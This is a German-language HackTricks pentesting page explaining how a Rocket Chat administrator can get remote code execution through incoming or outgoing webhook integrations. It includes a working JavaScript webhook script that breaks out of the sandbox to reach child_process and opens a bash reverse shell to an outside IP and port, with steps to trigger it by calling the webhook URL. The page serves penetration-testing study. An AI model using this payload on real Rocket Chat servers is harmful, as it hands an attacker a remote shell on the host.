German - Ht
HackTricks Training Twitter Linkedin Sponsor

Rocket Chat

Erlernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen:

RCE

Wenn Sie Administrator in Rocket Chat sind, können Sie RCE erhalten.

  • Gehen Sie zu Integrations und wählen Sie Neue Integration und wählen Sie eine beliebige: Eingehender WebHook oder Ausgehender WebHook.

  • /admin/integrations/incoming

const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")

  • Konfiguriere den WebHook (der Kanal und der Benutzername müssen vorhanden sein):

  • Konfiguriere das WebHook-Skript:

  • Speichere die Änderungen

  • Erhalte die generierte WebHook-URL:

  • Rufe sie mit curl auf und du solltest die Reverse-Shell erhalten

Lerne AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen:

PreviousPythonNextSpecial HTTP headers

Last updated